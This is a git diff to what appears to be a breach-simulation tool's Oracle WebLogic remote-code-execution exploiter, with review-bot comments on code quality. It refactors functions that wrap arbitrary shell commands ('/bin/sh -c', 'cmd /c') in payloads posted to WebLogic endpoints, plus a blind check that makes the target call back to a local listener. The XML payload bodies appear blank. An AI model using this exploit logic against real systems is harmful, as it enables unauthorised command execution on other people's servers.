diff --git a/infection_monkey/config.py b/infection_monkey/config.py
index b5df92f55..f8094817c 100644
--- a/infection_monkey/config.py
+++ b/infection_monkey/config.py
@@ -191,7 +191,8 @@ class Configuration(object):
# TCP Scanner
HTTP_PORTS = [80, 8080, 443,
- 8008, 7001 # HTTP alternate
+ 8008, # HTTP alternate
+ 7001 # Oracle Weblogic default server port
]
tcp_target_ports = [22,
2222,
diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py
index bd6cbc777..4169bb537 100644
--- a/infection_monkey/exploit/weblogic.py
+++ b/infection_monkey/exploit/weblogic.py
@@ -17,11 +17,11 @@ import logging
__author__ = "VakarisZ"
LOG = logging.getLogger(__name__)
-# How long server waits for get request
+# How long server waits for get request in seconds
SERVER_TIMEOUT = 4
-# How long to wait for a request to go to vuln machine and then to our server from there
+# How long to wait for a request to go to vuln machine and then to our server from there. In seconds
REQUEST_TIMEOUT = 2
-# How long to wait for response in exploitation
+# How long to wait for response in exploitation. In seconds
EXECUTION_TIMEOUT = 15
URLS = ["/wls-wsat/CoordinatorPortType",
"/wls-wsat/CoordinatorPortType11",
@@ -55,40 +55,10 @@ class WebLogicExploiter(WebRCE):
return exploit_config
def exploit(self, url, command):
- empty_payload = '''
-
-
-
-
-
-
-
-
-
- '''
if 'linux' in self.host.os['type']:
- cmd_base = '/bin/sh'
- cmd_opt = '-c'
- command += ' 1> /dev/null 2> /dev/null'
+ payload = self.exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
else:
- cmd_base = 'cmd'
- cmd_opt = '/c'
- command += ' 1> NUL 2> NUL'
-
- payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
+ payload = self.exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
try:
post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
except Exception as e:
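Review bot: `exploit` has no docstring and neither branch says why the command's output is thrown away; a one-line docstring plus a comment above `if 'linux' in self.host.os['type']:` such as `# presumably because the check is blind (see IndicationHTTPServer): output is never read back, so both streams go to the null device` would make the two near-identical `exploit_payload(...)` calls self-explaining. The suffix strings `' 1> /dev/null 2> /dev/null'` and `' 1> NUL 2> NUL'` are the only thing that differs per OS besides the shell and its option, so a short comment on that asymmetry is enough; no code change is needed. The exception handler and return value of `exploit` continue in the next hunk.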
@@ -96,7 +66,7 @@ class WebLogicExploiter(WebRCE):
print(e)
return True
- class HTTPServer(threading.Thread):
+ class IndicationHTTPServer(threading.Thread):
"""
Http server built to wait for GET requests. Because oracle web logic vuln is blind,
we determine if we can exploit by either getting a GET request from host or not.
@@ -109,6 +79,7 @@ class WebLogicExploiter(WebRCE):
self._stopped = False
self.lock = lock
threading.Thread.__init__(self)
+ self.daemon = True
def run(self):
class S(BaseHTTPRequestHandler):
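Review bot: `self.daemon = True` carries no comment on why the listener is a daemon thread, which matters because `check_if_exploitable` waits only `SERVER_TIMEOUT` on `join()` before calling `stop()`; a note such as `# daemon: an unfinished listener must never block interpreter exit` records the intent. The assignment has to precede `start()`, which its placement at the end of `__init__` guarantees. The enclosing `__init__` starts outside the hunk.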
@@ -132,43 +103,81 @@ class WebLogicExploiter(WebRCE):
def check_if_exploitable(self, url):
# Server might get response faster than it starts listening to it, we need a lock
- lock = threading.Lock()
- local_port = get_free_tcp_port()
- local_ip = get_interface_to_target(self.host.ip_addr)
- httpd = WebLogicExploiter.HTTPServer(local_ip, local_port, lock)
- httpd.daemon = True
- lock.acquire()
- httpd.start()
- lock.acquire()
- generic_check_payload = '''
-
-
-
-
- http://{lhost}:{lport}
-
-
-
-
-
-
-
-
-
- '''
- payload = generic_check_payload.format(lhost=local_ip, lport=local_port)
+ httpd, lock = self._start_http_server()
+ payload = self.test_payload(ip=httpd._local_ip, port=httpd._local_port)
try:
post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
except exceptions.ReadTimeout:
+ # Our request does not get response thus we get ReadTimeout error
pass
except Exception as e:
LOG.error("Something went wrong: %s" % e)
+ self._stop_http_server(httpd, lock)
+ return httpd.get_requests > 0
+ def _start_http_server(self):
+ lock = threading.Lock()
+ local_port = get_free_tcp_port()
+ local_ip = get_interface_to_target(self.host.ip_addr)
+ httpd = self.IndicationHTTPServer(local_ip, local_port, lock)
+ lock.acquire()
+ httpd.start()
+ lock.acquire()
+ return httpd, lock
+
+ def _stop_http_server(self, httpd, lock):
lock.release()
httpd.join(SERVER_TIMEOUT)
httpd.stop()
- if httpd.get_requests > 0:
- exploited = True
- else:
- exploited = False
- return exploited
+ return True
+
+
+ @staticmethod
+ def exploit_payload(cmd_base, cmd_opt, command):
+ empty_payload = '''
+
+
+
+
+
+
+
+
+
+ '''
+ payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
+ return payload
+
+ @staticmethod
+ def test_payload(ip, port):
+ generic_check_payload = '''
+
+
+
+
+ http://{host}:{port}
+
+
+
+
+
+
+
+
+
+ '''
+ payload = generic_check_payload.format(host=ip, port=port)
+ return payload
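Review bot: The comment `# Server might get response faster than it starts listening to it, we need a lock` still sits above `httpd, lock = self._start_http_server()`, while the acquire/start/acquire handoff it explains moved into `_start_http_server`; move it next to the first `lock.acquire()` there. `_stop_http_server` ends with a vestigial `return True` that `check_if_exploitable` discards, and it runs only on the normal path; adding `finally: self._stop_http_server(httpd, lock)` to the `try` around `post(...)` releases the lock and joins the listener even when something other than `Exception` unwinds. `check_if_exploitable` also reads `httpd._local_ip` and `httpd._local_port`, attributes the nested class marks private; returning `local_ip, local_port` together with `httpd, lock` from `_start_http_server`, or dropping the underscores, keeps the helper boundary clean. Pre-existing but now isolated in its own helper: if the listener thread fails before it releases the lock, the second `lock.acquire()` never returns; a bounded acquire is presumably available if the project targets Python 3 — confirm.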